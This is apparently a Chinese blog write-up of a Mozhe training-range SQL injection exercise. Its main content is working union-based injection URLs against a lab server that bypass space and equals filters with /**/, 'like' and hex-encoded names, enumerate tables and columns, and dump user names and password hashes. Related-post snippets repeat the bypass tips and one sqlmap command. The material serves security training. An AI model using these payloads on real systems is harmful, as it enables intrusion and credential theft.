墨者靶场-SQL过滤字符后手工注入漏洞测试(第1题)

最新推荐文章于 2025-08-02 16:58:52 发布
原创 最新推荐文章于 2025-08-02 16:58:52 发布 · 414 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍了一种利用SQL注入漏洞的方法,通过特殊字符绕过防御,确定数据库信息、表名、字段名及字段值,最终破解登录获取关键信息。

                                                  墨者学习

                                                 By/shy014

  1. 进去首页又看到熟悉的公告

  1. 通过简单的测试,确定存在sql注入漏洞,但是输入and 1=1 ,and 1=2,order by,union select ,and都没有反应。

  1. 经过尝试,用/**/代替空格,然后将URL进行URL编码就可以绕过
  2. 确定有4个字段

5,确定回显位置

  1. 确定当前数据库和用户

http://219.153.49.228:46365/new_list.php?id=2/**/union/**/select/**/1,database(),user(),4#

6,确定当前数据库中的表名(库名要用hex编码 直接使用database()我没成功)

http://219.153.49.228:46365/new_list.php?id=2/**/union/**/select/**/1,group_concat(table_name),version(),4/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/0x6d6f7a68655f64697363757a5f73746f726d67726f7570

7,确定表中的字段名

http://219.153.49.228:46365/new_list.php?id=2/**/union/**/select/**/1,group_concat(column_name),version(),4/**/from/**/information_schema.columns/**/where/**/table_name/**/like/**/0x73746f726d67726f75705f6d656d626572

8,确定字段的值

http://219.153.49.228:46365/new_list.php

?id=2/**/union/**/select/**/1,group_concat(id,name,password),version(),4/**/from/**/stormgroup_member

9.破解MD5 登陆获得key

墨者学院SQL过滤字符手工注入漏洞测试(1)
痴人说梦梦中人
11-13 388
1、 我也没想到那么多弯弯绕绕的,看到评论区有提示,就照做了,编写url编码脚本,获取注入payload,测试回显位置。 #!/usr/bin/env python # -*- coding:UTF-8 -*- #time:2019/11/9 1:03 #author:White9527 from urllib import parse import re #查询语句 s1 = """ord...
墨者靶场 初级:SQL过滤字符手工注入漏洞测试
qq_43233085的博客
01-13 566
墨者靶场 初级:SQL过滤字符手工注入漏洞测试目背景介绍实训目标解方向解步骤 目 背景介绍 安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境Apache+PHP+MySQL,PHP代码对客户端提交的参数做了些许过滤。来感受过滤过后的SQL手工注入吧。 实训目标 1、掌握SQL注入原理; 2、了解手工注入的方法; 3、了解字符串的URL加解密; 4、了解SQL注入...
墨者-SQL过滤字符手工注入漏洞测试(1)
zr1213159840的博客
12-10 948
和以前的简单目一样,看目的提示以及自己的测试知道过滤了=,–+,空格符号。等于可以使用like进行替代,空格可以使用/**/进行替代。最主要的,感觉目给了误解,没有说准确,目说url加密,但是经过测试直接选在网上选择url加密的链接并不行,最后测试是url网址16进制加密才可以,链接如下 url16进制加密 下面开始正式步骤: 首先是测试是否存在注入,将id=1改成id=2,没得显示,可能存在漏洞。 然后我们再测试下id=1 and 1=1和and 1=2行不行,需要注意的是,需要对空格以及=进
SQL过滤字符手工注入漏洞测试(1)
weixin_30240349的博客
04-23 179
https://www.mozhe.cn/bug/detail/a1diUUZsa3ByMkgrZnpjcWZOYVEyUT09bW96aGUmozhe 分析目,属于时间盲注,这种情况,通常使用sqlmap 直接注入就行了,手动语法太复杂了!!! sqlmap -u "http://219.153.49.228:49703/new_list.php?id=1" --ta...
墨者靶场-SQL手工注入漏洞测试(MySQL数据库-字符)
weixin_46694260的博客
03-27 4166
0x00 前言 我们都知道,SQL注入分数字型和字符型,我们上次讲的是最基本的数字型SQL注入,这次我们就来讲最基本的字符SQL注入。同样,如果是明白原理和方法的话,看懂这篇文章并不难,但是如果不清楚原理和方法的话…还是可以看的,大家多多给我点赞吧,哈哈哈哈哈,还是那句话,菜鸟一个,大佬勿喷~ 0x01 过程 首先,还是老样子,我们先看一下目 这里通过目我们知道,这次SQL注入字符型的SQL注入 那我们就进入靶场环境 可以看到和上次一样,有一个登录系统,登录框下面有一个维护新闻轮播框 我们点进去
墨者_SQL过滤字符手工注入漏洞测试(第3)
weixin_50698958的博客
10-12 505
靶场: https://www.mozhe.cn/bug/detail/ZVBYR3I3eG9USnpIT0xqaDdtR09SQT09bW96aGUmozhe 背景介绍 安全工程师"墨者"最近在练习搭建一个采购系统,为了安全起见,“墨者”对该系统做了部分防护措施,请你帮助他测试系统是否安全。 实训目标 1、掌握SQL注入原理; 2、了解手工注入的方法; 3、了解MySQL的数据结构; 4、了解SQL注入常用注释字符; 5、了解sql注入常用绕过姿势; 解方向 手工进行SQL注入测试
墨者学院SQL手工注入漏洞测试(MySQL数据库-字符)
最新发布
2303_81096390的博客
08-02 694
进入靶场环境,点击登录框下面的那一串流动的字符进入具体的注入点页面查看url,发现有可变的参数?id=,此处为字符注入sql注入分为字符注入和数字型注入,两者有什么区别呢,简单来说就是字符注入需要闭合,而数字型注入不需要闭合具体解释:为什么字符型需要闭合,数字型不需要?
墨者靶场---1SQL手工注入漏洞测试
qq_43168364的博客
08-21 338
实训目标 掌握SQL注入原理; 了解手工注入的方法; 了解MySQL的数据结构; 了解字符串的MD5加解密; sql注入的流程 1、判断注入点 2、判断注入类型,是字符型还是数字型 3、判断字段数 4、判断显示位 5、得库名 6、得表名 7、得列名 8、得数据 盲注和报错注入可能不太会用到上面的步骤,但是大致思想都是相同的。 注入步骤 起初以为是在登录窗口进行的POST注入,试了很多次没有成功,后来发现下面还有一个页面 在这里找到了它的注入点在URL中 接下来判断注入类型(这里and应该是被
墨者学院—— SQL手工注入漏洞测试(MySQL数据库-字符)
Lollipop_zhi的博客
02-26 2419
1.启动靶场环境,老地方点击 2.看地址栏,合理怀疑是否有注入点 这里插入知识点——怎么判断有注入点? 一般方法: and 1=1 正常 and 1=2 错误 背后的原理是逻辑运算 真且真=真;真且假=假 所以只需要让它能判断出假,就可以合理怀疑存在注入点 比如:id=jhfjkashlk(瞎打的) 改成 id=jhdak 显示异常,有注入点 3.尝试简单使用order by 猜解列名数量,不成功 order by 之后我才判断了单引号闭合,也就是id=tingjigon
SQL注入漏洞测试
09-12
SQL注入漏洞测试入门篇
墨者学院—SQL过滤字符手工注入漏洞测试
没事我溜达
03-16 1354
靶场地址: SQL过滤字符手工注入漏洞测试(1)_SQL注入_在线靶场_墨者学院_专注于网络安全人才培养 关于CTFHUB中的sql注入以及文件上传知识点我们已经学习过一遍了,如果大家都掌握的话,那我们也算是过了入门这个关了。 今天来学习墨者学院中的字符过滤靶场 我们打开靶场 我们进到靶场看到一个登录页面 看到这我也是很激动呀,打开BP就是一顿爆破,结果没爆破出来.. 然后仔细看到下方有个导航条我我们点进去 注意看这个URL,我就怀疑注入点在这里,然后打开.
墨者学院-SQL过滤字符手工注入漏洞测试(1)
weixin_38131137的博客
03-01 204
一试验就清楚是被过滤了,在这里有几点提示的 1、如果是空格、=的过滤,用/**/ 与 like替换 2、这里里面有坑,百度后才发现,url编码存在简单模式和复杂模式 3、下载个小葵,或者用编码网站http://web.chacuo.net/charseturlencode 4、后续发现再补 ...
墨者学院----SQL过滤字符手工注入漏洞测试(1)
qq_43590351的博客
01-22 624
SQL过滤字符手工注入漏洞测试(1) 按照基本流程我们在url中输入单引号报错,说明存在SQL注入,但是在输入order by union select发现页面 保持正常,有可能我们输入的字符过滤 过滤的"="号可以利用like代替,空格用==/**/==代替 判断字段数 /**/order/**/by/**/4 介绍一个在线的url编码解码网站 http://web.chacuo.net/charseturlencode 由于被过滤所以我们要进行url的编码。%2f%2a%2a%2f%6f%7
墨者SQL过滤字符手工注入漏洞测试(1)
wswr的博客
03-12 2039
思路:注入嘛,那就是该试的都试试,然后你会发现单引号页面跳转了虽然没有和之前一样有sql报错什么的,而且空格order,by ,select什么的字符都被过滤 那么就是要用url编码的方式去绕过滤,值得注意的是空格用/**/代替,=用like代替 简单说就是和正常注入的不同的地方就是每一步注入的代码都要换成url编码的形式再去注入,然后就和正常注入没什么区别了 ps:这里其实一开始我也没什么思路的QAQ,然后就无脑sqlmap了,后面会发现sqlmap抛出来的账号密码都不行,所以还是得手注可恶 总结
墨者 - SQL过滤字符手工注入漏洞测试(1)
吃肉唐僧的博客
07-04 1431
一开始使用order by,union select ,and 字段,发现返回并没有变化。 推测这些字段是已经过滤掉了 后来,上网查询后发现 ,不但这些字段过滤,还有空格和‘=’也被过滤掉了 所以‘=’可以用Like 替代,空格用/**/,url 要编码转义 在这里有个坑,花了我不少时间 一般url都是用在线url解码,例如:https://tool.chinaz.com/tool...
笔记:SQL过滤字符手工注入漏洞测试(1)
m0_67399862的博客
05-26 629
一打开网页时,发现正常打and 1=1的语句都被过滤了 考虑空格被过滤 将空格用/**/表示转换为URL时,发现语句仍报错,考虑有可能是等号被过滤 将=用like表示转换为URL 相当于输入了and 1=1的语句,页面正常 相当于输入了and 1=2的语句,发现页面报错,说明有SQL注入 用order by语句查询字段数 说明字段数只有4个 发现语句没有拼接在一起 将id=1改为id=-1 接下来按常规的爆库,爆表,...
墨者-sql手工注入漏洞测试
04-29
在进行手工注入漏洞测试时,墨者安全团队通常会通过一系列的步骤来进行测试。首先,他们会对目标网站进行初步信息收集,包括了解目标网站的架构、数据库类型、应用程序等等。然后,他们会通过手工注入的方式对目标...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值